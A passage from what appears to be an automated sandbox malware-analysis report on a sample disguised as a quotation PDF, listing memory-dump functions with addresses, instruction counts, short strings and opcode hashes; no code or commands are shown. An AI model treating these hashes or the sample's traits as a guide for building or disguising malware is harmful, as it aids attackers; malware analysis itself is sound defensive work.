Opcode Fuzzy Hash: 98fa2bb705f059dd55b9ef8c574c4722723b8ead159a0e4737f176a61184c949
Instruction Fuzzy Hash: 3F51BE31B18A4A4FEBA8DA1CE4457B977E2FBA8740F14417AD04DC3293CE24EC82C781

Function 00007FF887CD01D0 Relevance: 1.4, Strings: 1, Instructions: 171COMMON

Download Yara Rule

Strings

0Wp, xrefs: 00007FF887CD69C1

Memory Dump Source

Source File: 00000000.00000002.1936174017.00007FF887CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887CD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff887cd0000_QUOTATION_OCTQTRA071244#U00faPDF.jbxd

Similarity

API ID:
String ID: 0Wp
API String ID: 0-545783698
Opcode ID: 52fd91a9a2d71bb4c1443d182517c770a60312b5e4c74eafb69bfe132aec2da4
Instruction ID: e60723a8b10652488cb11e7ee5340f3c1bc73d52fc3fd987492264ccad814e72
Opcode Fuzzy Hash: 52fd91a9a2d71bb4c1443d182517c770a60312b5e4c74eafb69bfe132aec2da4
Instruction Fuzzy Hash: 00412921F588491FE799A76CA4592BD3BE2FFAA790B0401BAE10DC7287DD289842C341

Function 00007FF887AF190D Relevance: 1.4, Strings: 1, Instructions: 135COMMON

Download Yara Rule

Strings

r6f, xrefs: 00007FF887AF19E2

Memory Dump Source

Source File: 00000000.00000002.1935021594.00007FF887AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff887af0000_QUOTATION_OCTQTRA071244#U00faPDF.jbxd

Similarity

API ID:
String ID: r6f
API String ID: 0-3006726731
Opcode ID: 4bb422e28d919fbdf9432eb1aefa45c8305503fc0beb71c098e477e610496d41
Instruction ID: 789fad55cf22ac8946f16c4d42c758d1a4822d1023b41852ed333b67c65df8fc
Opcode Fuzzy Hash: 4bb422e28d919fbdf9432eb1aefa45c8305503fc0beb71c098e477e610496d41
Instruction Fuzzy Hash: A4416261E5C5594BEB58AF6888A63BD73E2FF98790F40017AD44ECB2C7CE286C05C781

Function 00007FF887CD1675 Relevance: 1.4, Strings: 1, Instructions: 125COMMON

Download Yara Rule

Strings

0_L, xrefs: 00007FF887CD176D

Memory Dump Source

Source File: 00000000.00000002.1936174017.00007FF887CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887CD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff887cd0000_QUOTATION_OCTQTRA071244#U00faPDF.jbxd

Similarity

API ID:
String ID: 0_L
API String ID: 0-3037507185
Opcode ID: 2fd0fbb7bde6564814b65393fc79eeff0d988f887bc587948631d439d6e73eba
Instruction ID: 344437a3342761f9e7d685dae546b822c3fb4debf62cb3f411a78ca2268f353c
Opcode Fuzzy Hash: 2fd0fbb7bde6564814b65393fc79eeff0d988f887bc587948631d439d6e73eba
Instruction Fuzzy Hash: 86312D3264CB861FE365E61CE8566F93BE1FF46264F19007ED48CC7193DE15B846C282

Function 00007FF887CD16FB Relevance: 1.3, Strings: 1, Instructions: 87COMMON

Download Yara Rule

Strings

0_L, xrefs: 00007FF887CD176D

Memory Dump Source

Source File: 00000000.00000002.1936174017.00007FF887CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887CD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff887cd0000_QUOTATION_OCTQTRA071244#U00faPDF.jbxd

Similarity

API ID:
String ID: 0_L
API String ID: 0-3037507185
Opcode ID: 680f15271fc6cb0ff42c05222b54c741e93a84e1545807ec65a2ffb18aad98eb
Instruction ID: 7dca98795ff1b3a3ef5ed53a72c8a4574f1219559ecb9e90a4eefeff3c8d10db
Opcode Fuzzy Hash: 680f15271fc6cb0ff42c05222b54c741e93a84e1545807ec65a2ffb18aad98eb
Instruction Fuzzy Hash: 3F11B07175CA491FE768961CA80A7B937D7EB95350F06017ED44DC3293DD15AC438282

Function 00007FF887CD31BB Relevance: 1.3, Strings: 1, Instructions: 82COMMON

Download Yara Rule

Strings

H, xrefs: 00007FF887CD3229

Memory Dump Source

Source File: 00000000.00000002.1936174017.00007FF887CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887CD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff887cd0000_QUOTATION_OCTQTRA071244#U00faPDF.jbxd

Similarity

API ID:
String ID: H
API String ID: 0-2852464175
Opcode ID: cdae7e92dc22714bd4b29c22632a66835d84f432afcc67847e1382348498ccba
Instruction ID: 9623a1291f20643d66f23130f6dafcb5ab003a8596d860e4cc508c78771fb954
Opcode Fuzzy Hash: cdae7e92dc22714bd4b29c22632a66835d84f432afcc67847e1382348498ccba
Instruction Fuzzy Hash: 7A21CF31B49E4A9FE399EB3C98556687BE2FF9974071401B9D00DC72A3DE28EC42C380

Function 00007FF887AF20C6 Relevance: 1.3, Strings: 1, Instructions: 67COMMON

Download Yara Rule

Strings

r6f, xrefs: 00007FF887AF20EF

Memory Dump Source

Source File: 00000000.00000002.1935021594.00007FF887AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff887af0000_QUOTATION_OCTQTRA071244#U00faPDF.jbxd

Similarity

API ID:
String ID: r6f
API String ID: 0-3006726731
Opcode ID: ddad1065aae611e0646f6cf2153920f18f2343161168aedcaf7edc59bfada880
Instruction ID: 434f46af8a608658ebacf2ff3aa260a5a5684d3c975c09adfc1b3e2bf5242b40
Opcode Fuzzy Hash: ddad1065aae611e0646f6cf2153920f18f2343161168aedcaf7edc59bfada880
Instruction Fuzzy Hash: AD110A21A8C9891FE755DA68685637D77E1FF9A350B0801BBC00DC72D3ED48AC86C356

Function 00007FF887CD3280 Relevance: 1.2, Instructions: 1175COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1936174017.00007FF887CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887CD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff887cd0000_QUOTATION_OCTQTRA071244#U00faPDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ff6445018119bcf3ed8ed5ee3d06d85e9b588bdb0429873008339b02d41d78f7
Instruction ID: f43ea37d631d1985ea589a1e8b6e4faddaf0ecdc0faccc3c12eb9ff263b94766
Opcode Fuzzy Hash: ff6445018119bcf3ed8ed5ee3d06d85e9b588bdb0429873008339b02d41d78f7
Instruction Fuzzy Hash: 9392E3A188D686CFF7769624C8165AC7FF2FF56390F0501F9C48D8B5A3EA1CA80AC751

Function 00007FF887CD45D6 Relevance: .8, Instructions: 842COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1936174017.00007FF887CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887CD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff887cd0000_QUOTATION_OCTQTRA071244#U00faPDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3c53e3d60e14ea6ffc56fd1698191d608c4c44a7ebcae89d5aaa6e53b0b5d112
Instruction ID: 2c8bd1dae62c85615aaeea7d2dbccf8a4a43a7905fee1ff9732b4bf4ee7a37b0
Opcode Fuzzy Hash: 3c53e3d60e14ea6ffc56fd1698191d608c4c44a7ebcae89d5aaa6e53b0b5d112
Instruction Fuzzy Hash: 8F42A030A58A498FEBA8EB28D8557AD7BF2FF59340F1401B9D40DC7296DE34AD42CB41

Function 00007FF887CD4619 Relevance: .5, Instructions: 534COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1936174017.00007FF887CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887CD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff887cd0000_QUOTATION_OCTQTRA071244#U00faPDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8e25de688b98f2fb1ca80b4a258c28dbb9cd1ab0ad236ce1914982b5e699f8a0
Instruction ID: 3d7af82b8a1e0376e8799b544e4792533de2c63618070206ff415ac6edf283c0
Opcode Fuzzy Hash: 8e25de688b98f2fb1ca80b4a258c28dbb9cd1ab0ad236ce1914982b5e699f8a0
Instruction Fuzzy Hash: FF027E30A58A598FDBA8EB28D4557AD7BF2FF59340F0401B9D40DC7296DE34AD42CB81

Function 00007FF887AF74B6 Relevance: .4, Instructions: 413COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1935021594.00007FF887AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff887af0000_QUOTATION_OCTQTRA071244#U00faPDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 25e25b5193be6290119bf06f0007f96e9ce6a4fa71337b96223d2154c80bdd52
Instruction ID: b36c053a9d6ef680cd706d1a566921c80e681eeb268b9111283870422979610a
Opcode Fuzzy Hash: 25e25b5193be6290119bf06f0007f96e9ce6a4fa71337b96223d2154c80bdd52
Instruction Fuzzy Hash: 2ED1E620A0CE854FE7559B7898662A87BF1FF5A350F5902FAD08DC72D3DE289C46C352

Function 00007FF887AF7589 Relevance: .4, Instructions: 409COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1935021594.00007FF887AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff887af0000_QUOTATION_OCTQTRA071244#U00faPDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f503452c6ed3c622f0af243ea7d265a30212ed6a9243be779796a9b4cf2e9573
Instruction ID: 24a5cf78a2bef012a6ab26af1b8cd31fc5edd490bbb3d4088583108ccdd68096
Opcode Fuzzy Hash: f503452c6ed3c622f0af243ea7d265a30212ed6a9243be779796a9b4cf2e9573
Instruction Fuzzy Hash: CAD1D530A0CA854FE7559B7888662A87BF1FF5A350F5902FAD08DC72D3DE289C46C752

Function 00007FF887AF76E9 Relevance: .4, Instructions: 391COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1935021594.00007FF887AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff887af0000_QUOTATION_OCTQTRA071244#U00faPDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8ae8d02a483eae7f2347a948420bcbbd49ae4597fc6723ceac9d5cf136ca498f
Instruction ID: 779a20be18a87194c02bcb5ad626fef0715ca990bab8a5f60e48a8624d60a2ac
Opcode Fuzzy Hash: 8ae8d02a483eae7f2347a948420bcbbd49ae4597fc6723ceac9d5cf136ca498f
Instruction Fuzzy Hash: E7C1F420A0DE854FE7569B7898262687BF1EF4A350F5902FAD08DC72D3DE289C46C352

Function 00007FF887AF77A8 Relevance: .4, Instructions: 388COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1935021594.00007FF887AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff887af0000_QUOTATION_OCTQTRA071244#U00faPDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 85dba9c5e1ba95ba8a98d168fe3dcd33cf4a90d61bf056b535144e53869ebd3e
Instruction ID: 944a83eea5b028a2ba7ad8bb4c1240c6c09bfba85007f309e8937d4d4e0853fc
Opcode Fuzzy Hash: 85dba9c5e1ba95ba8a98d168fe3dcd33cf4a90d61bf056b535144e53869ebd3e
Instruction Fuzzy Hash: 6AC1E520A0DE854FE7569B7898662687BF1EF4A350F5902FED08DC72D3DE289C46C352

Function 00007FF887AF73BF Relevance: .4, Instructions: 387COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1935021594.00007FF887AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff887af0000_QUOTATION_OCTQTRA071244#U00faPDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6404e015fda86e567adb289927f6291d2d0d26c3cef94d36fced0b0a1fa45872
Instruction ID: 7be84cfa17770565c0beb353d9c1a0192d68e7e317d2596fdd2c578e5817b2dc
Opcode Fuzzy Hash: 6404e015fda86e567adb289927f6291d2d0d26c3cef94d36fced0b0a1fa45872
Instruction Fuzzy Hash: D9C1F420A0DE854FE7569B7888662687BF1FF4A350F5902FAD08DC72D3DE289C46C352

Function 00007FF887AF734F Relevance: .4, Instructions: 386COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1935021594.00007FF887AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff887af0000_QUOTATION_OCTQTRA071244#U00faPDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 19f2222c143c2d77b123becae373260400eb46b7c4a5957c36dc39a06a057bab
Instruction ID: 5e1213562840fb26257c2085a73caef334463b2acef3b437c0fe4b634ec88d47
Opcode Fuzzy Hash: 19f2222c143c2d77b123becae373260400eb46b7c4a5957c36dc39a06a057bab
Instruction Fuzzy Hash: 05C1F420A0DE854FE75A9B7888662687BF1FF5A350F5902FAD08DC72D3DE189C46C352

Function 00007FF887AF5F4E Relevance: .4, Instructions: 384COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1935021594.00007FF887AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff887af0000_QUOTATION_OCTQTRA071244#U00faPDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e6c149ee61c6e4579b0963d2990c5139efda3efbe01cdd75e330eec9eece345b
Instruction ID: 1476d103cc786c3a10f5576ac992c0ccedd2f0251d72c8112accda8ed9077818
Opcode Fuzzy Hash: e6c149ee61c6e4579b0963d2990c5139efda3efbe01cdd75e330eec9eece345b
Instruction Fuzzy Hash: 6EC11620A4DE854FE7569B3888662687BF1FF4A350F5902FAD08DC72D3DE189C46C352

Function 00007FF887AF5D35 Relevance: .4, Instructions: 384COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1935021594.00007FF887AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff887af0000_QUOTATION_OCTQTRA071244#U00faPDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eb9311d6728157092987366a269645b2c4f775ed719d3989c2197e3f7b6ac073
Instruction ID: ebe623ef2bb871e657bc9aa6d0e9fbde79b44bbd8d6517436fdd8e8e92223dfe
Opcode Fuzzy Hash: eb9311d6728157092987366a269645b2c4f775ed719d3989c2197e3f7b6ac073
Instruction Fuzzy Hash: 81C11620A4DE854FE7569B7888662687BF1FF4A350F5902FAD08DC72D3DE189C46C352

Function 00007FF887AF6141 Relevance: .4, Instructions: 384COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1935021594.00007FF887AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff887af0000_QUOTATION_OCTQTRA071244#U00faPDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 751356e9ae0807b3a71fd5f502823a33d3890123c7eeee5c651a9ba6cf67352c
Instruction ID: 87f76a9d77e4d15b8d320b0e7efa1719b4ad6b44fbcf783f62667c5b917c768c
Opcode Fuzzy Hash: 751356e9ae0807b3a71fd5f502823a33d3890123c7eeee5c651a9ba6cf67352c
Instruction Fuzzy Hash: 0DC11620A4DE854FE7569B3888662687BF1FF4A350F4902FAD08DC72D3DE289C46C352

Function 00007FF887AF726F Relevance: .4, Instructions: 383COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1935021594.00007FF887AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff887af0000_QUOTATION_OCTQTRA071244#U00faPDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ea716ccdf38951c5747aeada538ddd1d65be3b59675e099fa92fec7763a315b9
Instruction ID: 860054419e4192cf7fc3ed876cddd008aa2bf7de33a0aa70cad7c1f75782cd44
Opcode Fuzzy Hash: ea716ccdf38951c5747aeada538ddd1d65be3b59675e099fa92fec7763a315b9
Instruction Fuzzy Hash: 11C1F420A0DE854FE7569B7888662687BF1FF5A350F5902FAD08DC72D3DE289C46C352

Function 00007FF887AF72DF Relevance: .4, Instructions: 381COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1935021594.00007FF887AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff887af0000_QUOTATION_OCTQTRA071244#U00faPDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0abece0811bcb63169c0cefe12350429a43ab744e29ee978ff661065bdcc7128
Instruction ID: c98c25f9f30c1987c8e1ae448e80d4d38e5ae6e5fb5e725c8dfcdcdad4fa687f
Opcode Fuzzy Hash: 0abece0811bcb63169c0cefe12350429a43ab744e29ee978ff661065bdcc7128
Instruction Fuzzy Hash: 6BC10620A0DA854FE7569B7888662687BF1FF4A350F5902FED08DC72D3DE189C46C352

Function 00007FF887CD328C Relevance: .4, Instructions: 374COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1936174017.00007FF887CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887CD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff887cd0000_QUOTATION_OCTQTRA071244#U00faPDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 873d42376c0d8722b3db08b7d2799b28bcd4a4686b3c8bc4ff4004a7411aa476
Instruction ID: d0442a1b16162cbb113ba6cc1d3d39f8473a6455a632814db229c307e6bc86e4
Opcode Fuzzy Hash: 873d42376c0d8722b3db08b7d2799b28bcd4a4686b3c8bc4ff4004a7411aa476
Instruction Fuzzy Hash: E4C1F771A5C6868FF778D718C8466AC7BE2FF95350F1401BAD48DC7293DE28A846C781

Function 00007FF887AF713E Relevance: .4, Instructions: 364COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1935021594.00007FF887AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff887af0000_QUOTATION_OCTQTRA071244#U00faPDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 42bf3ecfe24dcb32b69c4f3783b64850fac4671b37eb6fa0a4bdc2cb6869dd6b
Instruction ID: a9c82a8eaaa8f0abd1aa1341dcfce49615650e12a696e7ad5caec56ca0a1bfa3
Opcode Fuzzy Hash: 42bf3ecfe24dcb32b69c4f3783b64850fac4671b37eb6fa0a4bdc2cb6869dd6b
Instruction Fuzzy Hash: 6EB1E420A0DF854FE7569B7888662687BF1EF4A350F5902FAD08DC72D3DE289C46C352

Function 00007FF887CD7EA0 Relevance: .4, Instructions: 362COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1936174017.00007FF887CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887CD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff887cd0000_QUOTATION_OCTQTRA071244#U00faPDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 554066f944908f76f4a1006b45709240686957d59009134221fd675f925907c5
Instruction ID: c50efde544813603ce95b47d69420d32504ebed518140e8fb8fb6778ec764409
Opcode Fuzzy Hash: 554066f944908f76f4a1006b45709240686957d59009134221fd675f925907c5
Instruction Fuzzy Hash: 4FB16030B589498FDB99EB68C4556BD7BF2FF99340B5401B9D04EC7292CE39AC42C741

Function 00007FF887CD5B04 Relevance: .3, Instructions: 327COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1936174017.00007FF887CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887CD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff887cd0000_QUOTATION_OCTQTRA071244#U00faPDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eb948f48d94c1b23cde3d5804fac5f57b73f2487cf75f31bd20ab99879722c08
Instruction ID: cbd8d43ba9f1c640b1ab60d8915635fe9ce3c5e35859c6d9cc447df54a837820
Opcode Fuzzy Hash: eb948f48d94c1b23cde3d5804fac5f57b73f2487cf75f31bd20ab99879722c08
Instruction Fuzzy Hash: FD914D30B58E594FDBA8EB1CD455ABD77F2FF99740B04017AD04EC7696CE24AC428781

Function 00007FF887CD2C2A Relevance: .3, Instructions: 304COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1936174017.00007FF887CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887CD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff887cd0000_QUOTATION_OCTQTRA071244#U00faPDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ddac151edec014b882b40484e887efcb26df03a5e35c95582ad802bc5dcf179a
Instruction ID: 0edde60bfc413a5b0431537496da58ac863c96b4cac7f7bc4ca42bcdb037286e
Opcode Fuzzy Hash: ddac151edec014b882b40484e887efcb26df03a5e35c95582ad802bc5dcf179a
Instruction Fuzzy Hash: FE91087294DA854FD779DB28C81656D7FF2FF9A340B1405B9C489CB193DB2CA88AC381

Function 00007FF887CD679A Relevance: .3, Instructions: 279COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1936174017.00007FF887CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887CD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff887cd0000_QUOTATION_OCTQTRA071244#U00faPDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c7a4f8039b69f6c122674f2783323991ef8ba6b3490db0fd97b0072b2bde2772
Instruction ID: 8b7a83ff5ae715f12a4d1df62a70e2cab4fb3d63ea508d51d87d1e47e5e0bce1
Opcode Fuzzy Hash: c7a4f8039b69f6c122674f2783323991ef8ba6b3490db0fd97b0072b2bde2772
Instruction Fuzzy Hash: 4981493194DA8A8FE765D62CCC455A87FF1FF5B391B0401FAE08DD72A3DA18A846C381

Function 00007FF887CD38D0 Relevance: .3, Instructions: 277COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1936174017.00007FF887CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887CD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff887cd0000_QUOTATION_OCTQTRA071244#U00faPDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8c5983077516860a3d297dc0ed9be4cbe549c9d08bf5b4af08bfdc9a0e43f580
Instruction ID: 8f40d344f77ee471bc0e436bdf295615f00a9b7b781bd7d0cdf5bc2da815ea1f
Opcode Fuzzy Hash: 8c5983077516860a3d297dc0ed9be4cbe549c9d08bf5b4af08bfdc9a0e43f580
Instruction Fuzzy Hash: D091F361A5DA868FF775DB28885666C7FF2FF96390F1801B9C48DC7193DD18A80AC381

Function 00007FF887AF102D Relevance: .3, Instructions: 275COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1935021594.00007FF887AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff887af0000_QUOTATION_OCTQTRA071244#U00faPDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a0c32473e694f738500aa6e97ed9cecfe24515eacce260150e399c906c15a1f1
Instruction ID: dafcd12b242ff2d62d41483b7a6320f80e03e480c39bfe81fadda017a8c6e453
Opcode Fuzzy Hash: a0c32473e694f738500aa6e97ed9cecfe24515eacce260150e399c906c15a1f1
Instruction Fuzzy Hash: 5581E131A4EA8A4FE7599738C86A6BD7BF0FF56380F1401FEC04ACB1E2D9189844C752

Function 00007FF887CD9B3A Relevance: .3, Instructions: 271COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1936174017.00007FF887CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887CD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff887cd0000_QUOTATION_OCTQTRA071244#U00faPDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e685e1eda0bfc2789f2f823f7f686b1e5362f08b8378335c212b0a375fccfb9c
Instruction ID: 60ece43743362cd1d7d8494e18b755e382877fbe9108ae342b936ba78a1072ce
Opcode Fuzzy Hash: e685e1eda0bfc2789f2f823f7f686b1e5362f08b8378335c212b0a375fccfb9c
Instruction Fuzzy Hash: 51815635A4CB894FE3A5D738D8452B97BE1FFA5254B0805BED04DCB1A3DB2CA882C741

Function 00007FF887AF78E8 Relevance: .3, Instructions: 269COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1935021594.00007FF887AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff887af0000_QUOTATION_OCTQTRA071244#U00faPDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 47486152835f2789a713ae27bc96b15b0293c296e7036847a501d9651d5d0b0f
Instruction ID: 23bc3459a55b61a1e7c9172f43baea53ffdc48e279a170145309c9c954df9ada
Opcode Fuzzy Hash: 47486152835f2789a713ae27bc96b15b0293c296e7036847a501d9651d5d0b0f
Instruction Fuzzy Hash: 5271B220B0CD494FE698AA3C985667D77E1FF89754F5406BDE08EC72D7DE28AC428342

Function 00007FF887CD1E90 Relevance: .2, Instructions: 212COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1936174017.00007FF887CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887CD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff887cd0000_QUOTATION_OCTQTRA071244#U00faPDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a59c816a5233c58ec938af1aeb0cc3052f253ebb2b001c956a99ec8c7741be6d
Instruction ID: 302d6fabc865f081402dfafdbd71ed2b7ba0572be5936987bac08f78f12a7d12
Opcode Fuzzy Hash: a59c816a5233c58ec938af1aeb0cc3052f253ebb2b001c956a99ec8c7741be6d
Instruction Fuzzy Hash: 89518021F5C94A4FEBA8DA2CD4596BD2BE2FF98790B4500B9D14EC7293DE18EC42C345

Function 00007FF887AF4169 Relevance: .2, Instructions: 194COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1935021594.00007FF887AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff887af0000_QUOTATION_OCTQTRA071244#U00faPDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 954ac69cbeebea9697ec8955427927fe7f208e23f5c9ee2b1c5df350d5758cb9
Instruction ID: 9d63dc5c9e6a8ef73a9c9a0d852568aac97cc205d3cade30b69adfab9c080e57
Opcode Fuzzy Hash: 954ac69cbeebea9697ec8955427927fe7f208e23f5c9ee2b1c5df350d5758cb9
Instruction Fuzzy Hash: 1E61E93054D7C64FD766DB2888526AA7BF0FF92350F1846BAC089C71D6D628A886C752

Function 00007FF887AF0E8E Relevance: .2, Instructions: 190COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1935021594.00007FF887AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff887af0000_QUOTATION_OCTQTRA071244#U00faPDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 24af3923e10932f7b179b773c0a156a02d4dc7a2eb9e0d2b894e9ef7f1f15f0d
Instruction ID: 10c2a53e479b11487e00241eb4e912a9dfed4d0b1772c017a526f563069c3462
Opcode Fuzzy Hash: 24af3923e10932f7b179b773c0a156a02d4dc7a2eb9e0d2b894e9ef7f1f15f0d
Instruction Fuzzy Hash: D351136194E7C91FD78797B8C85599E7FF1EF87210B0901EBD089CB0A3CA2C484AC352

Function 00007FF887CD4345 Relevance: .2, Instructions: 187COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1936174017.00007FF887CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887CD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff887cd0000_QUOTATION_OCTQTRA071244#U00faPDF.jbxd

Similarity

API ID:
String ID:
API String ID:
